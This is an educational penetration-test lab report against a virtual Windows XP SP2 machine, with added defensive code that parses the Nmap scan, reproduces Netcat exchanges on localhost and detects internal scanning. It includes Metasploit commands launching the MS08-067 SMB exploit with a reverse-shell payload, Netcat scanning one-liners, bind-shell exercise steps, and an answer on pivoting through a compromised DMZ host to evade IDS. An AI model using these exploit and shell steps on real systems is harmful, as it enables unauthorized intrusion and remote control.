ODIN Securities
This Report Was Prepared By:
ODINSEC CEO:
Phillip Rose
phirose@uat.edu
The information contained within this report is considered
educational and for learning purposes only. Inappropriate and
unauthorized disclosure of this report or portions of it could
result in significant damage or negative legal issues. This
report should be distributed to individuals on a Need-to-Know
basis only. Again, this document and all cases are hypothetical
and for educational and training purposes only.
Executive Summary of Security Report
    Introduction to Report
    Overview of Report
Operating System Identification
    Kali Linux, current version as of 10/16/2013
    Windows XP SP2
Tools
    Metasploit Framework
    NetCat
    Custom Script
XP SP2 attack
    Scanning
    Thought process for choosing exploit
    Exploit
NETCAT
    Grab a banner from a TCP service with Netcat and provide a screenshot.
    Use Netcat to show an open port on a system.
    Use Netcat to connect to a web server and issue either a HEAD or a GET request
    Use Netcat to listen verbosely on a port.
Vulnerable Image attacks
    Scanning
    Thought Process for choosing exploit
    Exploit
XP SP2 attack
Scanning
nmap -sS -A 192.168.159.141
Starting Nmap 6.01 ( http://nmap.org ) at 2013-11-13 17:49 EST
Nmap scan report for 192.168.159.141
Host is up (0.00026s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:16:8A:C4 (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: AKELLY-D3D808A1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:16:8a:c4 (VMware)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: akelly-d3d808a1
|   NetBIOS computer name: AKELLY-D3D808A1
|   Workgroup: WORKGROUP
|_  System time: 2013-11-13 17:50:05 UTC-7
Service Enumeration
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
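Added example, not part of the original report: a small triage parser for the Nmap -sS -A output reproduced above. It turns the port table and the host-script results into a structure and derives the defender-side findings a reviewer would pull out of this scan (SMB reachable, message signing off, SMBv1 only, out-of-date service pack) before deciding what to fix first. The embedded sample is the report's own scan output, laid out with Nmap's usual three-space indentation for script continuation lines; the finding texts are this example's wording.

```python
"""Triage parser for the Nmap scan shown in the report (added example)."""
import re

# The report's own scan output, with Nmap's standard script indentation.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.159.141
Host is up (0.00026s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:16:8A:C4 (VMware)
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: akelly-d3d808a1
|_  Workgroup: WORKGROUP
"""

# "135/tcp open  msrpc        Microsoft Windows RPC" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
# Script header: "| name:" (multi-line script) or "|_name: value" (single-line script).
# Continuation lines look like "|   text" / "|_  text" and deliberately do not match.
SCRIPT_HEADER_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Parse Nmap's normal output for one host into ports, scripts and OS CPEs."""
    host = {"ports": [], "scripts": {}, "os_cpe": []}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            host["ports"].append({"port": int(port), "proto": proto, "state": state,
                                  "service": service, "version": (version or "").strip()})
            continue
        if line.startswith("OS CPE:"):
            host["os_cpe"] = line.split(":", 1)[1].split()
            continue
        m = SCRIPT_HEADER_RE.match(line)
        if m:
            current = m.group(1)
            host["scripts"][current] = [m.group(2)] if m.group(2) else []
        elif line.startswith("|") and current:
            host["scripts"][current].append(line.lstrip("|_ ").strip())
    return host


def triage(host):
    """Derive the findings worth fixing from the parsed scan."""
    findings = []
    open_ports = {p["port"] for p in host["ports"] if p["state"] == "open"}
    if open_ports & {139, 445}:
        findings.append("SMB reachable on 139/445: restrict to trusted subnets or disable if unneeded")
    security = " ".join(host["scripts"].get("smb-security-mode", []))
    if "Message signing disabled" in security:
        findings.append("SMB message signing disabled: require signing so sessions cannot be tampered with")
    if "smb scripts: guest" in security:
        findings.append("Nmap's SMB scripts ran as guest: anonymous/guest enumeration works, disable guest access")
    if "doesn't support SMBv2" in " ".join(host["scripts"].get("smbv2-enabled", [])):
        findings.append("SMBv1 only: the host cannot negotiate a newer, hardened SMB dialect")
    if any("windows_xp::sp2" in cpe for cpe in host["os_cpe"]):
        findings.append("Windows XP SP2 detected: behind the final service pack (SP3), so missing later fixes")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap(SAMPLE_SCAN)):
        print("-", finding)
```

The parser keys on the layout Nmap actually emits: a single-line script is `|_name: value`, a multi-line script opens with `| name:` and indents its body, so the header regex needs exactly one `_` or space before the script name and nothing else. Every finding here is read straight from the scan; the same output that told the report's author which exploit to pick tells the owner of the host what to turn off.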
Thought process for choosing exploit
Since port 445 is open, experience shows that this computer is most likely running SMB over
this port (the default XP configuration). Based on this, I am going to select an exploit relevant to
SMB on Windows XP. After searching through msf, ms08_067_netapi is chosen as it is a known,
reliable exploit for this OS.
search smb
use exploit/windows/smb/ms08_067_netapi
Setting options for the attack
show options
set RHOST 192.168.159.141
show payloads
set PAYLOAD windows/shell/reverse_tcp_allports
set LHOST 192.168.159.147
exploit -j
NETCAT
1) Grab a banner from a TCP service with Netcat and provide a screenshot.
2) Use Netcat to show an open port on a system.
echo "" | netcat -v -n -w1 192.168.159.141 18-200
With one command I was able to complete both tasks. Netcat connects to each port in the range 18-200,
sends an empty string, and prints to the screen whatever the service returns, so the verbose output
lists each open port and shows any banner next to it. Unfortunately, my machine did not have any
banners to display.
Use Netcat to connect to a web server and issue either a HEAD or a GET request
Use Netcat to listen verbosely on a port and have the other send a shell.
Bind a shell to a port with Netcat
Create a file called transfer.txt that contains the text “Transfer Me”. Now, set Netcat up to
listen on a port and send this file when the port is connected to.
Connect to the system with the shell bound to the port
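Added example, not part of the original report: the Netcat exercises above (read a banner from a TCP service, issue a HEAD request to a web server, serve a file such as transfer.txt from a listener) done with plain sockets, with the other side of each exchange started on 127.0.0.1 so the whole thing runs offline. Every port, banner string, Server header value and file body here is constructed for the example; the `nc` command lines in the comments show which exercise each function corresponds to.

```python
"""Both sides of the Netcat exercises, on localhost (added example)."""
import http.server
import socket
import socketserver
import threading


def one_shot_listener(data, read_timeout=0.5):
    """Like `nc -l -p PORT < transfer.txt`: accept one client, send `data`, exit.
    Returns the ephemeral port the kernel picked."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        conn.settimeout(read_timeout)
        try:
            conn.recv(1024)            # drain anything the client sends first
        except socket.timeout:
            pass                       # a pure download sends nothing; that's fine
        conn.sendall(data)
        conn.shutdown(socket.SHUT_WR)  # clean FIN so the client sees EOF, not a reset
        conn.close()
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return port


def read_until_eof(host, port, send=b"", timeout=3.0):
    """Connect, optionally send something, then read until the peer closes."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if send:
            s.sendall(send)
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except (socket.timeout, ConnectionResetError):
            pass
    return b"".join(chunks)


def grab_banner(host, port):
    """Equivalent of `echo "" | nc -v -n -w1 host port`: send an empty line and
    keep whatever the service volunteers before it closes or the timeout hits."""
    return read_until_eof(host, port, send=b"\r\n")


class _Handler(http.server.BaseHTTPRequestHandler):
    server_version = "ExampleHTTPd/0.1"      # constructed Server header value

    def do_HEAD(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()

    def log_message(self, *args):            # keep the example quiet
        pass


def start_http_server():
    """Start a minimal HTTP server on an ephemeral port; returns (server, port)."""
    httpd = socketserver.TCPServer(("127.0.0.1", 0), _Handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd, httpd.server_address[1]


def http_head(host, port, path="/"):
    """Equivalent of `printf 'HEAD / HTTP/1.0\\r\\n\\r\\n' | nc host port`.
    HTTP/1.0 makes the server close after one response, so reading to EOF works.
    Returns (status line, headers dict)."""
    request = f"HEAD {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    raw = read_until_eof(host, port, send=request)
    head, _, _ = raw.partition(b"\r\n\r\n")
    status, *header_lines = head.decode("latin-1").split("\r\n")
    headers = dict(h.split(": ", 1) for h in header_lines if ": " in h)
    return status, headers


if __name__ == "__main__":
    p = one_shot_listener(b"220 mail.example.test ESMTP (constructed banner)\r\n")
    print("banner:", grab_banner("127.0.0.1", p))
    httpd, hp = start_http_server()
    print("HEAD:", http_head("127.0.0.1", hp))
    httpd.shutdown()
    p = one_shot_listener(b"Transfer Me\n")
    print("file:", read_until_eof("127.0.0.1", p))
```

The listener drains the client's first bytes before answering and shuts down its write side explicitly; without that, closing a socket that still has unread input makes the kernel send a reset instead of a clean close, which is the usual reason a banner grab "works in nc but not in my script". What these exchanges return (the ESMTP greeting, the Server header) is exactly the information the scan in this report was built on, which is why minimising what a service announces is a cheap hardening step.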
You are an attacker. Describe a scenario where you would want to / need to use port
redirection during an attack.
Most likely, I would do this when I am using a beachhead/zombie machine that I took over in
the DMZ to perform scans on my behalf. By using this machine that is compromised early in the
pen-test, I can get around IDS by having that machine do the scanning for me.
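Added example, not part of the original report: the pivot scenario in the answer above (a compromised DMZ host scanning on the attacker's behalf so the perimeter IDS never sees the scan) viewed from the defender's side. The traffic the pivot generates still has to cross the DMZ-to-internal firewall, so this detector runs over constructed firewall log lines and flags any source that reaches many distinct destination ports or hosts inside a short window, which is what a DMZ host looks like the moment it starts scanning inward. Log format, addresses and thresholds are all constructed for the example.

```python
"""Scan detection over DMZ firewall logs (added example)."""
from collections import defaultdict
from datetime import datetime

# Constructed lines: "<ISO timestamp> <action> <src> <dst> <proto> <dport>".
# 10.10.1.5 is the (hypothetical) DMZ host that has started scanning 10.20.0.1;
# 10.10.1.7 is a DMZ host behaving normally.
SAMPLE_LOG = """\
2013-11-13T17:40:00 ALLOW 10.10.1.5 10.20.0.3 udp 53
2013-11-13T17:49:30 ALLOW 10.10.1.7 10.20.0.2 tcp 443
2013-11-13T17:50:01 DENY  10.10.1.5 10.20.0.1 tcp 21
2013-11-13T17:50:01 DENY  10.10.1.5 10.20.0.1 tcp 22
2013-11-13T17:50:02 DENY  10.10.1.5 10.20.0.1 tcp 23
2013-11-13T17:50:02 DENY  10.10.1.5 10.20.0.1 tcp 25
2013-11-13T17:50:03 ALLOW 10.10.1.5 10.20.0.1 tcp 80
2013-11-13T17:50:03 ALLOW 10.10.1.5 10.20.0.1 tcp 135
2013-11-13T17:50:04 ALLOW 10.10.1.5 10.20.0.1 tcp 139
2013-11-13T17:50:04 DENY  10.10.1.5 10.20.0.1 tcp 443
2013-11-13T17:50:05 ALLOW 10.10.1.5 10.20.0.1 tcp 445
2013-11-13T17:50:05 DENY  10.10.1.5 10.20.0.1 tcp 3389
2013-11-13T17:50:06 DENY  10.10.1.5 10.20.0.1 tcp 8080
2013-11-13T17:50:06 DENY  10.10.1.5 10.20.0.1 tcp 8443
2013-11-13T17:50:10 ALLOW 10.10.1.7 10.20.0.2 tcp 443
2013-11-13T17:50:40 ALLOW 10.10.1.7 10.20.0.2 tcp 443
"""


def parse_line(line):
    """Split one constructed log line into a dict with a real timestamp and int port."""
    ts, action, src, dst, proto, dport = line.split()
    return {"ts": datetime.fromisoformat(ts), "action": action, "src": src,
            "dst": dst, "proto": proto, "dport": int(dport)}


def detect_scans(lines, window_s=60, port_threshold=10, host_threshold=5):
    """Return one alert per source whose connections inside any window_s-second
    window touch >= port_threshold distinct ports (port scan) or
    >= host_threshold distinct hosts (host sweep). Denied and allowed
    connections both count: a scanner probes closed ports too."""
    by_src = defaultdict(list)
    for line in lines:
        if line.strip():
            ev = parse_line(line)
            by_src[ev["src"]].append(ev)

    alerts = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        for i, start in enumerate(events):
            ports, hosts = set(), set()
            for ev in events[i:]:                       # window anchored at each event
                if (ev["ts"] - start["ts"]).total_seconds() > window_s:
                    break
                ports.add(ev["dport"])
                hosts.add(ev["dst"])
            if len(ports) >= port_threshold or len(hosts) >= host_threshold:
                alerts.append({"src": src, "start": start["ts"].isoformat(),
                               "ports": len(ports), "hosts": len(hosts)})
                break                                    # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_LOG.splitlines()):
        print(f"{alert['src']} touched {alert['ports']} ports on {alert['hosts']} host(s) "
              f"within {60}s starting {alert['start']}")
```

The point of the check is placement rather than cleverness: a pivot defeats the perimeter IDS only because that sensor sits on the wrong side of it, so the same counting logic applied to the internal firewall (or to NetFlow from the DMZ segment) still sees the scan. Thresholds are deliberately generous; a legitimate DMZ server rarely opens connections to ten distinct internal ports in a minute, and a scan like the one in this report hits far more than that.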